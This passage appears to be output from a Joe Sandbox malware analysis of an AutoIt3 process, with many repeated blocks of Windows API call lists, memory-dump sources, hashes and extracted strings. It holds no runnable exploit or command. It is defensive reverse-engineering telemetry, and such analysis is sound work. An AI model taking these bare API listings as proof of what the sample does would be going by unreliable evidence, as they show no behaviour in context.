                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                      • String ID:
                                      • API String ID: 3008561057-0
                                      • Opcode ID: 411abfa6013ed0ab6baf09697c254ed750f742917a5e7ba0c7e8ed82b6bc96ec
                                      • Instruction ID: e0dad7fae514fe81305be27590a77ae79ff817b6bbb7a2e6a6603f1818e152fe
                                      • Opcode Fuzzy Hash: 411abfa6013ed0ab6baf09697c254ed750f742917a5e7ba0c7e8ed82b6bc96ec
                                      • Instruction Fuzzy Hash: D311AC32501604EFDF10AFA4CC09BAE7BAAFF45316F14801AEC85D7210C7369D0ACB64
                                      APIs
                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00859200
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00859207
                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00859216
                                      • CloseHandle.KERNEL32(00000004), ref: 00859221
                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00859250
                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00859264
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                      • String ID:
                                      • API String ID: 1413079979-0
                                      • Opcode ID: 91963fb31a23ee61db577d22a25c46a08ffb309bd7b31fb2baa2e8b0fba731f7
                                      • Instruction ID: 3265fc0427e7dc6d3b0e8d3480df02099a1b0e92c615a5fe52aeadd8c0ab6a06
                                      • Opcode Fuzzy Hash: 91963fb31a23ee61db577d22a25c46a08ffb309bd7b31fb2baa2e8b0fba731f7
                                      • Instruction Fuzzy Hash: 9A11477250120EFFDF019FA4ED49BDA7BA9FB08305F084015FE44A2160C3769D64EB60
                                      APIs
                                      • GetDC.USER32(00000000), ref: 0085C34E
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0085C35F
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0085C366
                                      • ReleaseDC.USER32(00000000,00000000), ref: 0085C36E
                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0085C385
                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0085C397
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      • Opcode ID: 0ba5907e3adca8a32509baaed706b8e1aebb5b77728081c77272883dffb92c7d
                                      • Instruction ID: f78996b71f138b3c067ec28c1f1a29eaacc679d5ceea26dbb22cbf959a0661d0
                                      • Opcode Fuzzy Hash: 0ba5907e3adca8a32509baaed706b8e1aebb5b77728081c77272883dffb92c7d
                                      • Instruction Fuzzy Hash: 97012175E00318BFEB10ABA59C49A5ABFB8FF58751F044066FE04E7280D6709910CFA1
                                      APIs
                                        • Part of subcall function 008016CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00801729
                                        • Part of subcall function 008016CF: SelectObject.GDI32(?,00000000), ref: 00801738
                                        • Part of subcall function 008016CF: BeginPath.GDI32(?), ref: 0080174F
                                        • Part of subcall function 008016CF: SelectObject.GDI32(?,00000000), ref: 00801778
                                      • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0088C57C
                                      • LineTo.GDI32(00000000,00000003,?), ref: 0088C590
                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0088C59E
                                      • LineTo.GDI32(00000000,00000000,?), ref: 0088C5AE
                                      • EndPath.GDI32(00000000), ref: 0088C5BE
                                      • StrokePath.GDI32(00000000), ref: 0088C5CE
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                      • String ID:
                                      • API String ID: 43455801-0
                                      • Opcode ID: 8185fc4e21ad0963b0ad391cc5fedb70a6aa9ac6ce02d64757418268fa8ceb11
                                      • Instruction ID: aaefa02529cb673e99c26f973131220cd25ecf6b9fff6f7e6931f77d60f95e50
                                      • Opcode Fuzzy Hash: 8185fc4e21ad0963b0ad391cc5fedb70a6aa9ac6ce02d64757418268fa8ceb11
                                      • Instruction Fuzzy Hash: B011C97600010DBFDF12AF94DC88EAA7FADFB08354F048062BA199A161D771AE55DFA0
                                      APIs
                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008207EC
                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 008207F4
                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008207FF
                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0082080A
                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00820812
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0082081A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Virtual
                                      • String ID:
                                      • API String ID: 4278518827-0
                                      • Opcode ID: c2461c0f2d6b18f997d814954be0cae9c0153d1cfb858006616afea04c59e8ef
                                      • Instruction ID: 8eb747f304c180733398a1045ab7cfa6bd8055364a6c554bf83470f73e97091f
                                      • Opcode Fuzzy Hash: c2461c0f2d6b18f997d814954be0cae9c0153d1cfb858006616afea04c59e8ef
                                      • Instruction Fuzzy Hash: CC0148B09017597DE3009F5A8C85A52FEA8FF59354F04411BA15847941C7B5A864CBE5
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 008659B4
                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008659CA
                                      • GetWindowThreadProcessId.USER32(?,?), ref: 008659D9
                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008659E8
                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008659F2
                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008659F9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                      • String ID:
                                      • API String ID: 839392675-0
                                      • Opcode ID: abebb8da9f2a8df7b78ffbb63eb68164046b3eaa1a80133a9e2bb7bc801554cf
                                      • Instruction ID: b3fb0a050e5de2602c48556c3845fac5ab0a798ca21658712ab395e812fd828a
                                      • Opcode Fuzzy Hash: abebb8da9f2a8df7b78ffbb63eb68164046b3eaa1a80133a9e2bb7bc801554cf
                                      • Instruction Fuzzy Hash: F4F03032641258BFE7216B929C0DEEF7F7CFFC6B11F04015AFA05D1050D7A01A118AB5
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,?), ref: 008677FE
                                      • EnterCriticalSection.KERNEL32(?,?,0080C2B6,?,?), ref: 0086780F
                                      • TerminateThread.KERNEL32(00000000,000001F6,?,0080C2B6,?,?), ref: 0086781C
                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,0080C2B6,?,?), ref: 00867829
                                        • Part of subcall function 008671F0: CloseHandle.KERNEL32(00000000,?,00867836,?,0080C2B6,?,?), ref: 008671FA
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0086783C
                                      • LeaveCriticalSection.KERNEL32(?,?,0080C2B6,?,?), ref: 00867843
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                      • String ID:
                                      • API String ID: 3495660284-0
                                      • Opcode ID: 91c6685e7fe65dcd6a31d6e445288a957f40375e5e36a10d7a6321c9e5086566
                                      • Instruction ID: f65c4087e4506b0d4c5d88897d946a6f6738616006c488966b85d46ef36bf011
                                      • Opcode Fuzzy Hash: 91c6685e7fe65dcd6a31d6e445288a957f40375e5e36a10d7a6321c9e5086566
                                      • Instruction Fuzzy Hash: F2F05E32545212AFD7123BA4EC8CAAB7769FF45302B190423F102951A5CBB65801CFA0
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00859555
                                      • UnloadUserProfile.USERENV(?,?), ref: 00859561
                                      • CloseHandle.KERNEL32(?), ref: 0085956A
                                      • CloseHandle.KERNEL32(?), ref: 00859572
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0085957B
                                      • HeapFree.KERNEL32(00000000), ref: 00859582
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                      • String ID:
                                      • API String ID: 146765662-0
                                      • Opcode ID: 410aff338f53af1ce1ad3e6dda07cc16cf0212567616e61a75b24c4ef04d4e01
                                      • Instruction ID: 273c3293c202bbdf93e7e25ce26279589c62e3a8d25fc159a93d3be8594ef1ac
                                      • Opcode Fuzzy Hash: 410aff338f53af1ce1ad3e6dda07cc16cf0212567616e61a75b24c4ef04d4e01
                                      • Instruction Fuzzy Hash: AFE07577104505BFDB412FE5EC0C95ABF79FF49722B584622F21991570CB32A461EF50
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00878CFD
                                      • CharUpperBuffW.USER32(?,?), ref: 00878E0C
                                      • VariantClear.OLEAUT32(?), ref: 00878F84
                                        • Part of subcall function 00867B1D: VariantInit.OLEAUT32(00000000), ref: 00867B5D
                                        • Part of subcall function 00867B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00867B66
                                        • Part of subcall function 00867B1D: VariantClear.OLEAUT32(00000000), ref: 00867B72
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                      • API String ID: 4237274167-1221869570
                                      APIs
                                        • Part of subcall function 0081436A: _wcscpy.LIBCMT ref: 0081438D
                                      • _memset.LIBCMT ref: 0086332E
                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0086335D
                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00863410
                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0086343E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                      • String ID: 0
                                      • API String ID: 4152858687-4108050209
                                      APIs
                                      • CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00878A0E,?,00000000), ref: 0088DF71
                                      • SetErrorMode.KERNEL32(00000001,?,00000000,00000000,00000000,?,00878A0E,?,00000000,00000000), ref: 0088DFA7
                                      • GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 0088DFB8
                                      • SetErrorMode.KERNEL32(00000000,?,00000000,00000000,00000000,?,00878A0E,?,00000000,00000000), ref: 0088E03A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                      • String ID: DllGetClassObject
                                      • API String ID: 753597075-1075368562
                                      APIs
                                      • _memset.LIBCMT ref: 00862F67
                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00862F83
                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00862FC9
                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,008C7890,00000000), ref: 00863012
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Menu$Delete$InfoItem_memset
                                      • String ID: 0
                                      • API String ID: 1173514356-4108050209
                                      APIs
                                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0087DEAE
                                        • Part of subcall function 00811462: _memmove.LIBCMT ref: 008114B0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: BuffCharLower_memmove
                                      • String ID: cdecl$none$stdcall$winapi
                                      • API String ID: 3425801089-567219261
                                      APIs
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                        • Part of subcall function 0085B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0085B7BD
                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00859ACC
                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00859ADF
                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00859B0F
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$_memmove$ClassName
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 365058703-1403004172
                                      APIs
                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00871F18
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00871F3E
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00871F6E
                                      • InternetCloseHandle.WININET(00000000), ref: 00871FB5
                                        • Part of subcall function 00872B4F: GetLastError.KERNEL32(?,?,00871EE3,00000000,00000000,00000001), ref: 00872B64
                                        • Part of subcall function 00872B4F: SetEvent.KERNEL32(?,?,00871EE3,00000000,00000000,00000001), ref: 00872B79
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                      • String ID:
                                      • API String ID: 3113390036-3916222277
                                      APIs
                                        • Part of subcall function 00802111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0080214F
                                        • Part of subcall function 00802111: GetStockObject.GDI32(00000011), ref: 00802163
                                        • Part of subcall function 00802111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0080216D
                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00886A86
                                      • LoadLibraryW.KERNEL32(?), ref: 00886A8D
                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00886AA2
                                      • DestroyWindow.USER32(?), ref: 00886AAA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                      • String ID: SysAnimate32
                                      • API String ID: 4146253029-1011021900
                                      APIs
                                      • GetStdHandle.KERNEL32(0000000C), ref: 00867377
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008673AA
                                      • GetStdHandle.KERNEL32(0000000C), ref: 008673BC
                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 008673F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CreateHandle$FilePipe
                                      • String ID: nul
                                      • API String ID: 4209266947-2873401336
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00867444
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00867476
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00867487
                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 008674C1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CreateHandle$FilePipe
                                      • String ID: nul
                                      • API String ID: 4209266947-2873401336
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0086B297
                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0086B2EB
                                      • __swprintf.LIBCMT ref: 0086B304
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,00890980), ref: 0086B342
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume__swprintf
                                      • String ID: %lu
                                      • API String ID: 3164766367-685833217
                                      APIs
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
